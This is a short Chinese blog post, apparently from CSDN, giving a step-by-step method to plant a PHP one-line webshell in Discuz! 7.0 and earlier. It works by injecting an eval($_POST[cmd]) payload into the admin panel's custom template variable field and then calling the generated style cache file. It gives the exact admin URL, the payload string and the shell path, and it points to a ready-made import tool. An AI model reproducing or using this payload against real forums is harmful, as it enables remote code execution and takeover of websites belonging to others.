Discuz! 7.0 及以下版本后台拿webshell(无需创始人)

本文介绍了一种通过管理员账号登录后台并利用自定义模板变量功能植入一句话木马的方法。该方法适用于拥有管理员权限的用户,可在指定路径下生成WebShell,便于进一步的安全测试或维护操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

利用方法(论坛地址改成自己的),先用管理员帐号登陆后台,无需论坛创始人,管理员等级即可:
http://www.aaaa.com/bbs/admincp.php?action=styles&operation=edit&id=1&adv=1
中,最下面有个“自定义模板变量”,变量中填:

OLDJUN', '#999');eval($_POST[cmd]);//替换内容随便输入:1111,然后提交,一句话木马就产生了:
http://www.aaaaa.com/bbs/forumdata/cache/style_1.php

如果你修改的style的id是2的话,对于的shell就是style_2.php。

这个风格模板可以导入导出的,于是有了ring04h的那个dzshell,嫌麻烦可以直接用那个导入风格获取shell。

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值